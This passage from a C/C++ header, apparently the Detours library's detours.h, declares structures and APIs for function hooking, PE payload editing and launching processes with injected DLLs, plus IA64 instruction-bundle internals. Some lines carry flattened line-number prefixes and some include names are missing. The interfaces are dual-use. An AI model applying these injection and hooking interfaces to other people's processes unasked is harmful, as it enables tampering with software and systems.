typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, *PDETOUR_TRAMPOLINE;

/////////////////////////////////////////////////////////// Binary Structures.
//
#pragma pack(push, 8)
typedef struct _DETOUR_SECTION_HEADER
{
    DWORD       cbHeaderSize;
    DWORD       nSignature;
    DWORD       nDataOffset;
    DWORD       cbDataSize;

    DWORD       nOriginalImportVirtualAddress;
    DWORD       nOriginalImportSize;
    DWORD       nOriginalBoundImportVirtualAddress;
    DWORD       nOriginalBoundImportSize;

    DWORD       nOriginalIatVirtualAddress;
    DWORD       nOriginalIatSize;
    DWORD       nOriginalSizeOfImage;
    DWORD       cbPrePE;

    DWORD       nOriginalClrFlags;
    DWORD       reserved1;
    DWORD       reserved2;
    DWORD       reserved3;

    // Followed by cbPrePE bytes of data.
} DETOUR_SECTION_HEADER, *PDETOUR_SECTION_HEADER;

typedef struct _DETOUR_SECTION_RECORD
{
    DWORD       cbBytes;
    DWORD       nReserved;
    GUID        guid;
} DETOUR_SECTION_RECORD, *PDETOUR_SECTION_RECORD;

typedef struct _DETOUR_CLR_HEADER
{
    // Header versioning
    ULONG                   cb;
    USHORT                  MajorRuntimeVersion;
    USHORT                  MinorRuntimeVersion;

    // Symbol table and startup information
    IMAGE_DATA_DIRECTORY    MetaData;
    ULONG                   Flags;

    // Followed by the rest of the IMAGE_COR20_HEADER
} DETOUR_CLR_HEADER, *PDETOUR_CLR_HEADER;

typedef struct _DETOUR_EXE_RESTORE
{
    DWORD               cb;
    DWORD               cbidh;
    DWORD               cbinh;
    DWORD               cbclr;

    PBYTE               pidh;
    PBYTE               pinh;
    PBYTE               pclr;

    IMAGE_DOS_HEADER    idh;
    union {
        IMAGE_NT_HEADERS    inh;        // all environments have this
#ifdef IMAGE_NT_OPTIONAL_HDR32_MAGIC    // some environments do not have this
        IMAGE_NT_HEADERS32  inh32;
#endif
#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC    // some environments do not have this
        IMAGE_NT_HEADERS64  inh64;
#endif
#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC    // some environments do not have this
        BYTE                raw[sizeof(IMAGE_NT_HEADERS64) +
                                sizeof(IMAGE_SECTION_HEADER) * 32];
#else
        BYTE                raw[0x108 + sizeof(IMAGE_SECTION_HEADER) * 32];
#endif
    };
    DETOUR_CLR_HEADER   clr;

} DETOUR_EXE_RESTORE, *PDETOUR_EXE_RESTORE;

#ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC
C_ASSERT(sizeof(IMAGE_NT_HEADERS64) == 0x108);
#endif

// The size can change, but assert for clarity due to the muddying #ifdefs.
#ifdef _WIN64
C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x688);
#else
C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x678);
#endif

typedef struct _DETOUR_EXE_HELPER
{
    DWORD               cb;
    DWORD               pid;
    DWORD               nDlls;
    CHAR                rDlls[4];
} DETOUR_EXE_HELPER, *PDETOUR_EXE_HELPER;

#pragma pack(pop)

#define DETOUR_SECTION_HEADER_DECLARE(cbSectionSize) \
{ \
      sizeof(DETOUR_SECTION_HEADER),\
      DETOUR_SECTION_HEADER_SIGNATURE,\
      sizeof(DETOUR_SECTION_HEADER),\
      (cbSectionSize),\
      \
      0,\
      0,\
      0,\
      0,\
      \
      0,\
      0,\
      0,\
      0,\
}

/////////////////////////////////////////////////////////////// Helper Macros.
//
#define DETOURS_STRINGIFY(x)    DETOURS_STRINGIFY_(x)
#define DETOURS_STRINGIFY_(x)    #x

///////////////////////////////////////////////////////////// Binary Typedefs.
443 | // 444 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_BYWAY_CALLBACK)( 445 | _In_opt_ PVOID pContext, 446 | _In_opt_ LPCSTR pszFile, 447 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 448 | 449 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_FILE_CALLBACK)( 450 | _In_opt_ PVOID pContext, 451 | _In_ LPCSTR pszOrigFile, 452 | _In_ LPCSTR pszFile, 453 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 454 | 455 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_SYMBOL_CALLBACK)( 456 | _In_opt_ PVOID pContext, 457 | _In_ ULONG nOrigOrdinal, 458 | _In_ ULONG nOrdinal, 459 | _Out_ ULONG *pnOutOrdinal, 460 | _In_opt_ LPCSTR pszOrigSymbol, 461 | _In_opt_ LPCSTR pszSymbol, 462 | _Outptr_result_maybenull_ LPCSTR *ppszOutSymbol); 463 | 464 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_COMMIT_CALLBACK)( 465 | _In_opt_ PVOID pContext); 466 | 467 | typedef BOOL (CALLBACK *PF_DETOUR_ENUMERATE_EXPORT_CALLBACK)(_In_opt_ PVOID pContext, 468 | _In_ ULONG nOrdinal, 469 | _In_opt_ LPCSTR pszName, 470 | _In_opt_ PVOID pCode); 471 | 472 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FILE_CALLBACK)(_In_opt_ PVOID pContext, 473 | _In_opt_ HMODULE hModule, 474 | _In_opt_ LPCSTR pszFile); 475 | 476 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK)(_In_opt_ PVOID pContext, 477 | _In_ DWORD nOrdinal, 478 | _In_opt_ LPCSTR pszFunc, 479 | _In_opt_ PVOID pvFunc); 480 | 481 | // Same as PF_DETOUR_IMPORT_FUNC_CALLBACK but extra indirection on last parameter. 482 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK_EX)(_In_opt_ PVOID pContext, 483 | _In_ DWORD nOrdinal, 484 | _In_opt_ LPCSTR pszFunc, 485 | _In_opt_ PVOID* ppvFunc); 486 | 487 | typedef VOID * PDETOUR_BINARY; 488 | typedef VOID * PDETOUR_LOADED_BINARY; 489 | 490 | //////////////////////////////////////////////////////////// Transaction APIs. 
491 | // 492 | LONG WINAPI DetourTransactionBegin(VOID); 493 | LONG WINAPI DetourTransactionAbort(VOID); 494 | LONG WINAPI DetourTransactionCommit(VOID); 495 | LONG WINAPI DetourTransactionCommitEx(_Out_opt_ PVOID **pppFailedPointer); 496 | 497 | LONG WINAPI DetourUpdateThread(_In_ HANDLE hThread); 498 | 499 | LONG WINAPI DetourAttach(_Inout_ PVOID *ppPointer, 500 | _In_ PVOID pDetour); 501 | 502 | LONG WINAPI DetourAttachEx(_Inout_ PVOID *ppPointer, 503 | _In_ PVOID pDetour, 504 | _Out_opt_ PDETOUR_TRAMPOLINE *ppRealTrampoline, 505 | _Out_opt_ PVOID *ppRealTarget, 506 | _Out_opt_ PVOID *ppRealDetour); 507 | 508 | LONG WINAPI DetourDetach(_Inout_ PVOID *ppPointer, 509 | _In_ PVOID pDetour); 510 | 511 | BOOL WINAPI DetourSetIgnoreTooSmall(_In_ BOOL fIgnore); 512 | BOOL WINAPI DetourSetRetainRegions(_In_ BOOL fRetain); 513 | PVOID WINAPI DetourSetSystemRegionLowerBound(_In_ PVOID pSystemRegionLowerBound); 514 | PVOID WINAPI DetourSetSystemRegionUpperBound(_In_ PVOID pSystemRegionUpperBound); 515 | 516 | ////////////////////////////////////////////////////////////// Code Functions. 517 | // 518 | PVOID WINAPI DetourFindFunction(_In_ LPCSTR pszModule, 519 | _In_ LPCSTR pszFunction); 520 | PVOID WINAPI DetourCodeFromPointer(_In_ PVOID pPointer, 521 | _Out_opt_ PVOID *ppGlobals); 522 | PVOID WINAPI DetourCopyInstruction(_In_opt_ PVOID pDst, 523 | _Inout_opt_ PVOID *ppDstPool, 524 | _In_ PVOID pSrc, 525 | _Out_opt_ PVOID *ppTarget, 526 | _Out_opt_ LONG *plExtra); 527 | BOOL WINAPI DetourSetCodeModule(_In_ HMODULE hModule, 528 | _In_ BOOL fLimitReferencesToModule); 529 | 530 | ///////////////////////////////////////////////////// Loaded Binary Functions. 
531 | // 532 | HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr); 533 | HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast); 534 | PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule); 535 | ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule); 536 | BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule, 537 | _In_opt_ PVOID pContext, 538 | _In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport); 539 | BOOL WINAPI DetourEnumerateImports(_In_opt_ HMODULE hModule, 540 | _In_opt_ PVOID pContext, 541 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 542 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK pfImportFunc); 543 | 544 | BOOL WINAPI DetourEnumerateImportsEx(_In_opt_ HMODULE hModule, 545 | _In_opt_ PVOID pContext, 546 | _In_opt_ PF_DETOUR_IMPORT_FILE_CALLBACK pfImportFile, 547 | _In_opt_ PF_DETOUR_IMPORT_FUNC_CALLBACK_EX pfImportFuncEx); 548 | 549 | _Writable_bytes_(*pcbData) 550 | _Readable_bytes_(*pcbData) 551 | _Success_(return != NULL) 552 | PVOID WINAPI DetourFindPayload(_In_opt_ HMODULE hModule, 553 | _In_ REFGUID rguid, 554 | _Out_ DWORD *pcbData); 555 | 556 | _Writable_bytes_(*pcbData) 557 | _Readable_bytes_(*pcbData) 558 | _Success_(return != NULL) 559 | PVOID WINAPI DetourFindPayloadEx(_In_ REFGUID rguid, 560 | _Out_ DWORD * pcbData); 561 | 562 | DWORD WINAPI DetourGetSizeOfPayloads(_In_opt_ HMODULE hModule); 563 | 564 | ///////////////////////////////////////////////// Persistent Binary Functions. 
565 | // 566 | 567 | PDETOUR_BINARY WINAPI DetourBinaryOpen(_In_ HANDLE hFile); 568 | 569 | _Writable_bytes_(*pcbData) 570 | _Readable_bytes_(*pcbData) 571 | _Success_(return != NULL) 572 | PVOID WINAPI DetourBinaryEnumeratePayloads(_In_ PDETOUR_BINARY pBinary, 573 | _Out_opt_ GUID *pGuid, 574 | _Out_ DWORD *pcbData, 575 | _Inout_ DWORD *pnIterator); 576 | 577 | _Writable_bytes_(*pcbData) 578 | _Readable_bytes_(*pcbData) 579 | _Success_(return != NULL) 580 | PVOID WINAPI DetourBinaryFindPayload(_In_ PDETOUR_BINARY pBinary, 581 | _In_ REFGUID rguid, 582 | _Out_ DWORD *pcbData); 583 | 584 | PVOID WINAPI DetourBinarySetPayload(_In_ PDETOUR_BINARY pBinary, 585 | _In_ REFGUID rguid, 586 | _In_reads_opt_(cbData) PVOID pData, 587 | _In_ DWORD cbData); 588 | BOOL WINAPI DetourBinaryDeletePayload(_In_ PDETOUR_BINARY pBinary, _In_ REFGUID rguid); 589 | BOOL WINAPI DetourBinaryPurgePayloads(_In_ PDETOUR_BINARY pBinary); 590 | BOOL WINAPI DetourBinaryResetImports(_In_ PDETOUR_BINARY pBinary); 591 | BOOL WINAPI DetourBinaryEditImports(_In_ PDETOUR_BINARY pBinary, 592 | _In_opt_ PVOID pContext, 593 | _In_opt_ PF_DETOUR_BINARY_BYWAY_CALLBACK pfByway, 594 | _In_opt_ PF_DETOUR_BINARY_FILE_CALLBACK pfFile, 595 | _In_opt_ PF_DETOUR_BINARY_SYMBOL_CALLBACK pfSymbol, 596 | _In_opt_ PF_DETOUR_BINARY_COMMIT_CALLBACK pfCommit); 597 | BOOL WINAPI DetourBinaryWrite(_In_ PDETOUR_BINARY pBinary, _In_ HANDLE hFile); 598 | BOOL WINAPI DetourBinaryClose(_In_ PDETOUR_BINARY pBinary); 599 | 600 | /////////////////////////////////////////////////// Create Process & Load Dll. 
601 | // 602 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEA)( 603 | _In_opt_ LPCSTR lpApplicationName, 604 | _Inout_opt_ LPSTR lpCommandLine, 605 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 606 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 607 | _In_ BOOL bInheritHandles, 608 | _In_ DWORD dwCreationFlags, 609 | _In_opt_ LPVOID lpEnvironment, 610 | _In_opt_ LPCSTR lpCurrentDirectory, 611 | _In_ LPSTARTUPINFOA lpStartupInfo, 612 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 613 | 614 | typedef BOOL (WINAPI *PDETOUR_CREATE_PROCESS_ROUTINEW)( 615 | _In_opt_ LPCWSTR lpApplicationName, 616 | _Inout_opt_ LPWSTR lpCommandLine, 617 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 618 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 619 | _In_ BOOL bInheritHandles, 620 | _In_ DWORD dwCreationFlags, 621 | _In_opt_ LPVOID lpEnvironment, 622 | _In_opt_ LPCWSTR lpCurrentDirectory, 623 | _In_ LPSTARTUPINFOW lpStartupInfo, 624 | _Out_ LPPROCESS_INFORMATION lpProcessInformation); 625 | 626 | BOOL WINAPI DetourCreateProcessWithDllA(_In_opt_ LPCSTR lpApplicationName, 627 | _Inout_opt_ LPSTR lpCommandLine, 628 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 629 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 630 | _In_ BOOL bInheritHandles, 631 | _In_ DWORD dwCreationFlags, 632 | _In_opt_ LPVOID lpEnvironment, 633 | _In_opt_ LPCSTR lpCurrentDirectory, 634 | _In_ LPSTARTUPINFOA lpStartupInfo, 635 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 636 | _In_ LPCSTR lpDllName, 637 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 638 | 639 | BOOL WINAPI DetourCreateProcessWithDllW(_In_opt_ LPCWSTR lpApplicationName, 640 | _Inout_opt_ LPWSTR lpCommandLine, 641 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 642 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 643 | _In_ BOOL bInheritHandles, 644 | _In_ DWORD dwCreationFlags, 645 | _In_opt_ LPVOID lpEnvironment, 646 | _In_opt_ LPCWSTR lpCurrentDirectory, 647 | _In_ 
LPSTARTUPINFOW lpStartupInfo, 648 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 649 | _In_ LPCSTR lpDllName, 650 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 651 | 652 | #ifdef UNICODE 653 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllW 654 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEW 655 | #else 656 | #define DetourCreateProcessWithDll DetourCreateProcessWithDllA 657 | #define PDETOUR_CREATE_PROCESS_ROUTINE PDETOUR_CREATE_PROCESS_ROUTINEA 658 | #endif // !UNICODE 659 | 660 | BOOL WINAPI DetourCreateProcessWithDllExA(_In_opt_ LPCSTR lpApplicationName, 661 | _Inout_opt_ LPSTR lpCommandLine, 662 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 663 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 664 | _In_ BOOL bInheritHandles, 665 | _In_ DWORD dwCreationFlags, 666 | _In_opt_ LPVOID lpEnvironment, 667 | _In_opt_ LPCSTR lpCurrentDirectory, 668 | _In_ LPSTARTUPINFOA lpStartupInfo, 669 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 670 | _In_ LPCSTR lpDllName, 671 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 672 | 673 | BOOL WINAPI DetourCreateProcessWithDllExW(_In_opt_ LPCWSTR lpApplicationName, 674 | _Inout_opt_ LPWSTR lpCommandLine, 675 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 676 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 677 | _In_ BOOL bInheritHandles, 678 | _In_ DWORD dwCreationFlags, 679 | _In_opt_ LPVOID lpEnvironment, 680 | _In_opt_ LPCWSTR lpCurrentDirectory, 681 | _In_ LPSTARTUPINFOW lpStartupInfo, 682 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 683 | _In_ LPCSTR lpDllName, 684 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 685 | 686 | #ifdef UNICODE 687 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExW 688 | #else 689 | #define DetourCreateProcessWithDllEx DetourCreateProcessWithDllExA 690 | #endif // !UNICODE 691 | 692 | BOOL WINAPI DetourCreateProcessWithDllsA(_In_opt_ LPCSTR lpApplicationName, 
693 | _Inout_opt_ LPSTR lpCommandLine, 694 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 695 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 696 | _In_ BOOL bInheritHandles, 697 | _In_ DWORD dwCreationFlags, 698 | _In_opt_ LPVOID lpEnvironment, 699 | _In_opt_ LPCSTR lpCurrentDirectory, 700 | _In_ LPSTARTUPINFOA lpStartupInfo, 701 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 702 | _In_ DWORD nDlls, 703 | _In_reads_(nDlls) LPCSTR *rlpDlls, 704 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 705 | 706 | BOOL WINAPI DetourCreateProcessWithDllsW(_In_opt_ LPCWSTR lpApplicationName, 707 | _Inout_opt_ LPWSTR lpCommandLine, 708 | _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, 709 | _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, 710 | _In_ BOOL bInheritHandles, 711 | _In_ DWORD dwCreationFlags, 712 | _In_opt_ LPVOID lpEnvironment, 713 | _In_opt_ LPCWSTR lpCurrentDirectory, 714 | _In_ LPSTARTUPINFOW lpStartupInfo, 715 | _Out_ LPPROCESS_INFORMATION lpProcessInformation, 716 | _In_ DWORD nDlls, 717 | _In_reads_(nDlls) LPCSTR *rlpDlls, 718 | _In_opt_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 719 | 720 | #ifdef UNICODE 721 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsW 722 | #else 723 | #define DetourCreateProcessWithDlls DetourCreateProcessWithDllsA 724 | #endif // !UNICODE 725 | 726 | BOOL WINAPI DetourProcessViaHelperA(_In_ DWORD dwTargetPid, 727 | _In_ LPCSTR lpDllName, 728 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 729 | 730 | BOOL WINAPI DetourProcessViaHelperW(_In_ DWORD dwTargetPid, 731 | _In_ LPCSTR lpDllName, 732 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 733 | 734 | #ifdef UNICODE 735 | #define DetourProcessViaHelper DetourProcessViaHelperW 736 | #else 737 | #define DetourProcessViaHelper DetourProcessViaHelperA 738 | #endif // !UNICODE 739 | 740 | BOOL WINAPI DetourProcessViaHelperDllsA(_In_ DWORD dwTargetPid, 741 | _In_ DWORD nDlls, 742 | _In_reads_(nDlls) LPCSTR 
*rlpDlls, 743 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEA pfCreateProcessA); 744 | 745 | BOOL WINAPI DetourProcessViaHelperDllsW(_In_ DWORD dwTargetPid, 746 | _In_ DWORD nDlls, 747 | _In_reads_(nDlls) LPCSTR *rlpDlls, 748 | _In_ PDETOUR_CREATE_PROCESS_ROUTINEW pfCreateProcessW); 749 | 750 | #ifdef UNICODE 751 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsW 752 | #else 753 | #define DetourProcessViaHelperDlls DetourProcessViaHelperDllsA 754 | #endif // !UNICODE 755 | 756 | BOOL WINAPI DetourUpdateProcessWithDll(_In_ HANDLE hProcess, 757 | _In_reads_(nDlls) LPCSTR *rlpDlls, 758 | _In_ DWORD nDlls); 759 | 760 | BOOL WINAPI DetourUpdateProcessWithDllEx(_In_ HANDLE hProcess, 761 | _In_ HMODULE hImage, 762 | _In_ BOOL bIs32Bit, 763 | _In_reads_(nDlls) LPCSTR *rlpDlls, 764 | _In_ DWORD nDlls); 765 | 766 | BOOL WINAPI DetourCopyPayloadToProcess(_In_ HANDLE hProcess, 767 | _In_ REFGUID rguid, 768 | _In_reads_bytes_(cbData) PVOID pvData, 769 | _In_ DWORD cbData); 770 | BOOL WINAPI DetourRestoreAfterWith(VOID); 771 | BOOL WINAPI DetourRestoreAfterWithEx(_In_reads_bytes_(cbData) PVOID pvData, 772 | _In_ DWORD cbData); 773 | BOOL WINAPI DetourIsHelperProcess(VOID); 774 | VOID CALLBACK DetourFinishHelperProcess(_In_ HWND, 775 | _In_ HINSTANCE, 776 | _In_ LPSTR, 777 | _In_ INT); 778 | 779 | // 780 | ////////////////////////////////////////////////////////////////////////////// 781 | #ifdef __cplusplus 782 | } 783 | #endif // __cplusplus 784 | 785 | //////////////////////////////////////////////// Detours Internal Definitions. 
786 | // 787 | #ifdef __cplusplus 788 | #ifdef DETOURS_INTERNAL 789 | 790 | #define NOTHROW 791 | // #define NOTHROW (nothrow) 792 | 793 | ////////////////////////////////////////////////////////////////////////////// 794 | // 795 | #if (_MSC_VER < 1299) 796 | #include 797 | typedef IMAGEHLP_MODULE IMAGEHLP_MODULE64; 798 | typedef PIMAGEHLP_MODULE PIMAGEHLP_MODULE64; 799 | typedef IMAGEHLP_SYMBOL SYMBOL_INFO; 800 | typedef PIMAGEHLP_SYMBOL PSYMBOL_INFO; 801 | 802 | static inline 803 | LONG InterlockedCompareExchange(_Inout_ LONG *ptr, _In_ LONG nval, _In_ LONG oval) 804 | { 805 | return (LONG)::InterlockedCompareExchange((PVOID*)ptr, (PVOID)nval, (PVOID)oval); 806 | } 807 | #else 808 | #pragma warning(push) 809 | #pragma warning(disable:4091) // empty typedef 810 | #include 811 | #pragma warning(pop) 812 | #endif 813 | 814 | #ifdef IMAGEAPI // defined by DBGHELP.H 815 | typedef LPAPI_VERSION (NTAPI *PF_ImagehlpApiVersionEx)(_In_ LPAPI_VERSION AppVersion); 816 | 817 | typedef BOOL (NTAPI *PF_SymInitialize)(_In_ HANDLE hProcess, 818 | _In_opt_ LPCSTR UserSearchPath, 819 | _In_ BOOL fInvadeProcess); 820 | typedef DWORD (NTAPI *PF_SymSetOptions)(_In_ DWORD SymOptions); 821 | typedef DWORD (NTAPI *PF_SymGetOptions)(VOID); 822 | typedef DWORD64 (NTAPI *PF_SymLoadModule64)(_In_ HANDLE hProcess, 823 | _In_opt_ HANDLE hFile, 824 | _In_ LPSTR ImageName, 825 | _In_opt_ LPSTR ModuleName, 826 | _In_ DWORD64 BaseOfDll, 827 | _In_opt_ DWORD SizeOfDll); 828 | typedef BOOL (NTAPI *PF_SymGetModuleInfo64)(_In_ HANDLE hProcess, 829 | _In_ DWORD64 qwAddr, 830 | _Out_ PIMAGEHLP_MODULE64 ModuleInfo); 831 | typedef BOOL (NTAPI *PF_SymFromName)(_In_ HANDLE hProcess, 832 | _In_ LPSTR Name, 833 | _Out_ PSYMBOL_INFO Symbol); 834 | 835 | typedef struct _DETOUR_SYM_INFO 836 | { 837 | HANDLE hProcess; 838 | HMODULE hDbgHelp; 839 | PF_ImagehlpApiVersionEx pfImagehlpApiVersionEx; 840 | PF_SymInitialize pfSymInitialize; 841 | PF_SymSetOptions pfSymSetOptions; 842 | PF_SymGetOptions pfSymGetOptions; 
843 | PF_SymLoadModule64 pfSymLoadModule64; 844 | PF_SymGetModuleInfo64 pfSymGetModuleInfo64; 845 | PF_SymFromName pfSymFromName; 846 | } DETOUR_SYM_INFO, *PDETOUR_SYM_INFO; 847 | 848 | PDETOUR_SYM_INFO DetourLoadImageHlp(VOID); 849 | 850 | #endif // IMAGEAPI 851 | 852 | #if defined(_INC_STDIO) && !defined(_CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS) 853 | #error detours.h must be included before stdio.h (or at least define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS earlier) 854 | #endif 855 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 856 | 857 | #ifndef DETOUR_TRACE 858 | #if DETOUR_DEBUG 859 | #define DETOUR_TRACE(x) printf x 860 | #define DETOUR_BREAK() __debugbreak() 861 | #include 862 | #include 863 | #else 864 | #define DETOUR_TRACE(x) 865 | #define DETOUR_BREAK() 866 | #endif 867 | #endif 868 | 869 | #if 1 || defined(DETOURS_IA64) 870 | 871 | // 872 | // IA64 instructions are 41 bits, 3 per bundle, plus 5 bit bundle template => 128 bits per bundle. 873 | // 874 | 875 | #define DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE (3) 876 | 877 | #define DETOUR_IA64_TEMPLATE_OFFSET (0) 878 | #define DETOUR_IA64_TEMPLATE_SIZE (5) 879 | 880 | #define DETOUR_IA64_INSTRUCTION_SIZE (41) 881 | #define DETOUR_IA64_INSTRUCTION0_OFFSET (DETOUR_IA64_TEMPLATE_SIZE) 882 | #define DETOUR_IA64_INSTRUCTION1_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 883 | #define DETOUR_IA64_INSTRUCTION2_OFFSET (DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTION_SIZE + DETOUR_IA64_INSTRUCTION_SIZE) 884 | 885 | C_ASSERT(DETOUR_IA64_TEMPLATE_SIZE + DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE * DETOUR_IA64_INSTRUCTION_SIZE == 128); 886 | 887 | __declspec(align(16)) struct DETOUR_IA64_BUNDLE 888 | { 889 | public: 890 | union 891 | { 892 | BYTE data[16]; 893 | UINT64 wide[2]; 894 | }; 895 | 896 | enum { 897 | A_UNIT = 1u, 898 | I_UNIT = 2u, 899 | M_UNIT = 3u, 900 | B_UNIT = 4u, 901 | F_UNIT = 5u, 902 | L_UNIT = 6u, 903 | X_UNIT = 7u, 904 | }; 905 | struct DETOUR_IA64_METADATA 906 | { 907 | ULONG nTemplate 
: 8; // Instruction template. 908 | ULONG nUnit0 : 4; // Unit for slot 0 909 | ULONG nUnit1 : 4; // Unit for slot 1 910 | ULONG nUnit2 : 4; // Unit for slot 2 911 | }; 912 | 913 | protected: 914 | static const DETOUR_IA64_METADATA s_rceCopyTable[33]; 915 | 916 | UINT RelocateBundle(_Inout_ DETOUR_IA64_BUNDLE* pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 917 | 918 | bool RelocateInstruction(_Inout_ DETOUR_IA64_BUNDLE* pDst, 919 | _In_ BYTE slot, 920 | _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 921 | 922 | // 120 112 104 96 88 80 72 64 56 48 40 32 24 16 8 0 923 | // f. e. d. c. b. a. 9. 8. 7. 6. 5. 4. 3. 2. 1. 0. 924 | 925 | // 00 926 | // f.e. d.c. b.a. 9.8. 7.6. 5.4. 3.2. 1.0. 927 | // 0000 0000 0000 0000 0000 0000 0000 001f : Template [4..0] 928 | // 0000 0000 0000 0000 0000 03ff ffff ffe0 : Zero [ 41.. 5] 929 | // 0000 0000 0000 0000 0000 3c00 0000 0000 : Zero [ 45.. 42] 930 | // 0000 0000 0007 ffff ffff c000 0000 0000 : One [ 82.. 46] 931 | // 0000 0000 0078 0000 0000 0000 0000 0000 : One [ 86.. 83] 932 | // 0fff ffff ff80 0000 0000 0000 0000 0000 : Two [123.. 87] 933 | // f000 0000 0000 0000 0000 0000 0000 0000 : Two [127..124] 934 | BYTE GetTemplate() const; 935 | // Get 4 bit opcodes. 936 | BYTE GetInst0() const; 937 | BYTE GetInst1() const; 938 | BYTE GetInst2() const; 939 | BYTE GetUnit(BYTE slot) const; 940 | BYTE GetUnit0() const; 941 | BYTE GetUnit1() const; 942 | BYTE GetUnit2() const; 943 | // Get 37 bit data. 944 | UINT64 GetData0() const; 945 | UINT64 GetData1() const; 946 | UINT64 GetData2() const; 947 | 948 | // Get/set the full 41 bit instructions. 
949 | UINT64 GetInstruction(BYTE slot) const; 950 | UINT64 GetInstruction0() const; 951 | UINT64 GetInstruction1() const; 952 | UINT64 GetInstruction2() const; 953 | void SetInstruction(BYTE slot, UINT64 instruction); 954 | void SetInstruction0(UINT64 instruction); 955 | void SetInstruction1(UINT64 instruction); 956 | void SetInstruction2(UINT64 instruction); 957 | 958 | // Get/set bitfields. 959 | static UINT64 GetBits(UINT64 Value, UINT64 Offset, UINT64 Count); 960 | static UINT64 SetBits(UINT64 Value, UINT64 Offset, UINT64 Count, UINT64 Field); 961 | 962 | // Get specific read-only fields. 963 | static UINT64 GetOpcode(UINT64 instruction); // 4bit opcode 964 | static UINT64 GetX(UINT64 instruction); // 1bit opcode extension 965 | static UINT64 GetX3(UINT64 instruction); // 3bit opcode extension 966 | static UINT64 GetX6(UINT64 instruction); // 6bit opcode extension 967 | 968 | // Get/set specific fields. 969 | static UINT64 GetImm7a(UINT64 instruction); 970 | static UINT64 SetImm7a(UINT64 instruction, UINT64 imm7a); 971 | static UINT64 GetImm13c(UINT64 instruction); 972 | static UINT64 SetImm13c(UINT64 instruction, UINT64 imm13c); 973 | static UINT64 GetSignBit(UINT64 instruction); 974 | static UINT64 SetSignBit(UINT64 instruction, UINT64 signBit); 975 | static UINT64 GetImm20a(UINT64 instruction); 976 | static UINT64 SetImm20a(UINT64 instruction, UINT64 imm20a); 977 | static UINT64 GetImm20b(UINT64 instruction); 978 | static UINT64 SetImm20b(UINT64 instruction, UINT64 imm20b); 979 | 980 | static UINT64 SignExtend(UINT64 Value, UINT64 